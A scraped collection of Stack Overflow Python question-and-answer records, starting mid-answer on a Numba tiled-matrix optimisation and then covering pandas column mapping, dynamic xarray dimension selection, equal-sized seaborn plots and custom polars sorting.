very slow part arr[i, i] = 0 for j in range(i+1, n): arr[i, j] = arr[i, j-i-1] return arr Unfortunately the transposition is pretty inefficient and take nearly all the time... Optimizing is possible but not easy. We can divide the computation in dependent tiles (similar to how block LU decomposition algorithm work). This makes the code more complex much much faster thanks to a more efficient access pattern: # Compute the tile arr[start:stop,start:stop]. # Assume arr[:start,:start] has been already computed. # Assume start and stop are valid. @nb.njit('(uint8[:,::1], uint32, uint32)', inline='always') def compute_diag_tile(arr, start, stop): for i in range(start, stop): for j in range(start, i): arr[i, j] = arr[j, i-j-1] arr[i, i] = 0 for j in range(i+1, stop): arr[i, j] = arr[i, j-i-1] # Compute the tile arr[start:stop,stop:]. # Assume arr[start:stop,:stop] has been already computed. # Assume start and stop are valid. @nb.njit('(uint8[:,::1], uint32, uint32)', inline='always') def compute_upper_right_tile(arr, start, stop): n = np.uint32(arr.shape[1]) for i in range(start, stop): for j in range(stop, n): arr[i, j] = arr[i, np.uint64(j-i-1)] # Compute the tile arr[stop:,start:stop]. # Assume arr[start:stop,stop:] has been already computed; that is to say # compute_upper_right_tile has been called on the associated diag tile. # This function transposes the tile written by compute_upper_right_tile. # Assume start and stop are valid. @nb.njit('(uint8[:,::1], uint32, uint32)', inline='always') def compute_bottom_left_tile(arr, start, stop): n = np.uint32(arr.shape[0]) for i in range(stop, n): for j in range(start, stop): arr[i, j] = arr[j, i] @nb.njit('(uint8[:,::1], uint32, uint32)', inline='always') def compute_tile_group(arr, start, stop): compute_diag_tile(arr, start, stop) compute_upper_right_tile(arr, start, stop) compute_bottom_left_tile(arr, start, stop) @nb.njit('(uint32,)') def compute_v3(n): chunk_size = 32 arr = np.empty((n, n), np.uint8) arr[0, :] = 255 arr[:, 0] = 255 for start in range(1, n, chunk_size): if start + chunk_size <= n: compute_tile_group(arr, start, start + chunk_size) else: compute_tile_group(arr, start, n) return arr The transposition is still the slowest part of this code. It can be optimized further but at the expense of a significantly bigger code. I prefer to keep this reasonably simple, but note that one way to make the transposition much faster is to use SIMD intrinsics (certainly at least >2 faster). Benchmark Here are results for N=1024 on my machine (i5-9600KF CPU): find_complex_points: 173 ms PeteKirkham's code: 108 ms find_complex_points_1: 99 ms Weeble's code: 70 ms find_complex_points_2: 38 ms Vectorized Numpy code: 4.0 ms <----- PeteKirkham's code with Numba: 2.5 ms Numba code `compute_v2`: 0.70 ms Numba code `compute`: 0.66 ms Numba code `compute_v3`: 0.45 ms <----- find_complex_points_3: 0.44 ms The vectorised Numba code is much faster than the other implementation and the optimised Numba codes outperforms all implementation by a large margin (except the new find_complex_points_3)! One can parallelise some of the Numba codes to make it even faster but this is not trivial and it is certainly fast enough anyway, not to mention is will not scale well because the code is rather memory-bound for large N. Actually, a basic Numpy copy takes about 0.3 ms, which can be considered as a lower bound execution time. | 10 | 9 |
79,567,429 | 2025-4-10 | https://stackoverflow.com/questions/79567429/duplicate-and-rename-columns-on-pandas-dataframe | I guess this must be rather simple, but I'm struggling to find the easy way of doing it. I have a pandas DataFrame with the columns A to D and need to copy some of the columns to new ones. The trick is that it not just involves renaming, I also need to duplicate the values to new columns as well. Here is an example of the input: import pandas as pd df = pd.DataFrame({ 'A': [1,2,3], 'B':['2025-10-01', '2025-10-02', '2025-10-01'], 'C': ['2025-02-10', '2025-02-15', '2025-02-20'], 'D': [0, 5, 4], 'values': [52.3, 60, 70.6] }) mapping_dict = { 'table_1': { 'id': 'A', 'dt_start': 'B', 'dt_end': 'B', }, 'table_2': { 'id': 'D', 'dt_start': 'C', 'dt_end': 'C', }, } I'd like to have as output for table_1 a DataFrame as follows: id dt_start dt_end values 1 2025-10-01 2025-10-01 52.3 2 2025-10-02 2025-10-02 60 3 2025-10-01 2025-10-01 80.6 And I guess it is possible to infer the expected output for table_2. Note that the column values, which is not included in the mapping logic, should remain in the dataframe. I was able to achieve this by using a for loop, but I feel that should be a natural way of doing this directly on pandas without manually looping over the mapping dict and then dropping the extra columns. Here is my solution so far: table_name = 'table_1' new_df = df.copy() for new_col, old_col in mapping_dict[table_name].items(): new_df[new_col] = df[old_col] new_df = new_df.drop(mapping_dict[table_name].values(), axis='columns') Any help or suggestion will be appreciated! | IIUC, you can do this with this command, this is one of the reason I like to use the set_axis method in dataframes. table_name = 'table_1' df[list(mapping_dict[table_name].values())+['values']].set_axis(list(mapping_dict[table_name].keys())+['values'], axis=1) Output: id dt_start dt_end values 0 1 2025-10-01 2025-10-01 52.3 1 2 2025-10-02 2025-10-02 60.0 2 3 2025-10-01 2025-10-01 70.6 Or, table_name = 'table_2' df[list(mapping_dict[table_name].values())+['values']].set_axis(list(mapping_dict[table_name].keys())+['values'], axis=1) Output: id dt_start dt_end values 0 0 2025-02-10 2025-02-10 52.3 1 5 2025-02-15 2025-02-15 60.0 2 4 2025-02-20 2025-02-20 70.6 And, much like @khushalvaland you can create function for resuse: def gen_table(df, mapping, cols) -> pd.DataFrame: return (df[list(mapping.values())+cols] .set_axis(list(mapping.keys())+cols, axis=1)) gen_table(df, mapping = mapping_dict['table_1'], cols =['values']) gen_table(df, mapping = mapping_dict['table_2'], cols =['values']) Output: id dt_start dt_end values 0 1 2025-10-01 2025-10-01 52.3 1 2 2025-10-02 2025-10-02 60.0 2 3 2025-10-01 2025-10-01 70.6 and id dt_start dt_end values 0 0 2025-02-10 2025-02-10 52.3 1 5 2025-02-15 2025-02-15 60.0 2 4 2025-02-20 2025-02-20 70.6 | 2 | 3 |
79,567,480 | 2025-4-10 | https://stackoverflow.com/questions/79567480/how-to-select-from-xarray-dataset-without-hardcoding-the-name-of-the-dimension | When selecting data from an xarray.Dataset type, the examples they provide all include hardcoding the name of the dimension like so: ds = ds.sel(state_name='California') TLDR; How can you select from a dataset without hardcoding the dimension name? How would I achieve something like this since the below doesn't work? dimName = 'state_name' ds = ds.sel(dimName='California') I have a situation where I won't know the name of the dimension to make my selection on until runtime of the application, but I can't figure out how to select the data with xarray's methods unless I know the dimension name ahead of time. For instance, let's say I have a dataset like this, where dim2, dim3, and dim4 all correspond to ID numbers of different spatial bounds that a user could select on a map: import xarray as xr import numpy as np dim2 = ['12', '34', '56', '78'] dim3 = ['121', '341', '561', '781'] dim4 = ['1211', '3411', '5611', '7811'] time_mn = np.arange(1, 61) ds1 = xr.Dataset( data_vars={ 'prcp_dim2': (['dim2', 'time_mn'], np.random.rand(len(dim2), len(time_mn))), 'prcp_dim3': (['dim3', 'time_mn'], np.random.rand(len(dim3), len(time_mn))), 'prcp_dim4': (['dim4', 'time_mn'], np.random.rand(len(dim4), len(time_mn))), }, coords={ 'dim2': (['dim2'], dim2), 'dim3': (['dim3'], dim3), 'dim4': (['dim4'], dim4), 'time_mn': (['time_mn'], time_mn) } ) print(ds1) <xarray.Dataset> Size: 6kB Dimensions: (dim2: 4, time_mn: 60, dim3: 4, dim4: 4) Coordinates: * dim2 (dim2) <U2 32B '12' '34' '56' '78' * dim3 (dim3) <U3 48B '121' '341' '561' '781' * dim4 (dim4) <U4 64B '1211' '3411' '5611' '7811' * time_mn (time_mn) int64 480B 1 2 3 4 5 6 7 8 ... 53 54 55 56 57 58 59 60 Data variables: prcp_dim2 (dim2, time_mn) float64 2kB 0.8804 0.2733 ... 0.3227 0.4637 prcp_dim3 (dim3, time_mn) float64 2kB 0.1391 0.4541 ... 0.1688 0.3271 prcp_dim4 (dim4, time_mn) float64 2kB 0.4784 0.6666 ... 0.3619 0.4864 Now let's say a a map is presented to a user and the user chooses ID 78 to calculate something from the dataset. From this ID, I can glean the dimension value 78 belongs to is dim2. How would I then make a selection on the xarray dataset where dim2=78 without hardcoding dim2 in? selectedID = request.get('id') #This is the user's choice, let's say they chose '78'. #Get the dimension name the selectedID belongs to if len(selectedID) == 2: selectedDimension = 'dim2' elif len(selectedID) == 3: selectedDimension = 'dim3' elif len(selectedID) == 4: selectedDimension = 'dim4' #This is what I want to be able to do, but it does not work ds = ds.sel(selectedDimension=selectedID) Is there a way to select the data without hardcoding the dimension name? Edit: I do realize there is a solution like this, but that falls apart if say I wanted to put the above version of the if/else in a callable function because I could be reusing it elsewhere and I don't necessarily want to select the data when I call the function. if len(selectedID) == 2: ds = ds.sel(dim2=selectedID) elif len(selectedID) == 3: ds = ds.sel(dim3=selectedID) elif len(selectedID) == 4: ds = ds.sel(dim4=selectedID) | This is a nice place to use Python dictionary unpacking. To get this: res = ds.sel(state_name='California') You can: dim_sel = {'state_name': 'California'} res = ds.sel(**dim_sel) And of course directly: res = ds(**{'state_name': 'California'}} Unpacking the dictionary with ** spreads the keys as argument names and the values as the argument values. This solution works anywhere in Python where you need to pass named arguments, it's not specific to xarray. Since you can just construct dictionaries on the fly with strings as key values, you are no longer stuck with using identifiers as parameter names. Your example where you select a dimension based on the length of some value would work out to: dim_lookup = { 2: 'dim2', 3: 'dim3', 4: 'dim4' } res = ds.sel(**{dim_lookup[len(some_value)]: some_value}) Note that this assumes there will be a key for every possible length of selectedID, but I'm sure you can see how to make this more robust. Also note that I assign to res instead of ds because I'm not sure you actually want to overwrite the original xarray reference with your selection. | 1 | 2 |
79,566,634 | 2025-4-10 | https://stackoverflow.com/questions/79566634/how-to-make-same-sized-plots-with-sns-matplotlib | plt.figure(figure=(6,8)) sns.barplot(data=csat_korean,x='grade',y='percentage').set_title('Korean'); plt.show() sns.barplot(data=csat_math,x='grade',y='percentage').set_title('Math'); plt.show() sns.barplot(data=csat_english,x='grade',y='percentage').set_title('English'); plt.show() Hello, the above code is me trying to plot with sns(everything is imported). However, the plots I get are not constant in size. This is the result I get. How would I fix this code so that the plots are same in size, and the last graph is not annoyingly smaller than the other plots? Greatly appreciate it! | With seaborn's catplot(), you can generate a grid of bar plots, starting from a combined dataframe. The size of the subplots is set via the height= and aspect= parameters (width = height * aspect). By default, the x and y axis are shared between the subplots, so they look very similar. from matplotlib import pyplot as plt import seaborn as sns import pandas as pd import numpy as np # generate some dummy test data courses = ['Math', 'English', 'Korean'] csat_data = pd.DataFrame({'course': np.repeat(courses, 9), 'grade': np.tile(np.arange(1, 10), 3), 'count': np.random.randint(10, 1000, size=27)}) csat_data['percentage'] = csat_data.groupby('course')['count'].transform(lambda x: (x / x.sum()) * 100) g = sns.catplot(csat_data, kind='bar', x='grade', y='percentage', row='course', height=8, aspect=6/8) plt.show() PS: For your original dataframes, you can combine them like: csat_math['course'] = 'Math' csat_english['course'] = 'English' csat_korean['course'] = 'Korean' csat_data = pd.concat([csat_math, csat_english, csat_korean]) You can also let Seaborn calculate the histograms directly from the original data. courses = ['Math', 'English', 'Korean'] csat_data = pd.DataFrame({'course': np.repeat(courses, 50), 'grade': np.clip(np.random.normal(loc=6, scale=1.8, size=150).round().astype(int), 1, 9)}) g = sns.displot(csat_data, kind='hist', stat='percent', x='grade', discrete=True, row='course', height=8, aspect=6/8) g.set(xticks=range(1, 10)) plt.show(block=True) | 1 | 1 |
79,566,761 | 2025-4-10 | https://stackoverflow.com/questions/79566761/sort-a-polars-dataframe-based-on-an-external-list | Morning, I'm not sure if this can be achieved.. Let's say i have a polars dataframe with cols a, b (whatever). df = pl.DataFrame({"a":[1,2,3,4,5],"b":['x','y','z','p','f']}) And a list.. l = [1,3,5,2,4]; is it possible to sort the dataframe (using column "a") using the list l as the sorting order? Thanks in advance! | You can use an Enum to sort with a custom order, however as Enum only works with strings, you first need to temporarily convert to string: df.sort(by=pl.col('a').cast(pl.String).cast(pl.Enum(list(map(str, l))))) Output: ┌─────┬─────┐ │ a ┆ b │ │ --- ┆ --- │ │ i64 ┆ str │ ╞═════╪═════╡ │ 1 ┆ x │ │ 3 ┆ z │ │ 5 ┆ f │ │ 2 ┆ y │ │ 4 ┆ p │ └─────┴─────┘ | 2 | 2 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.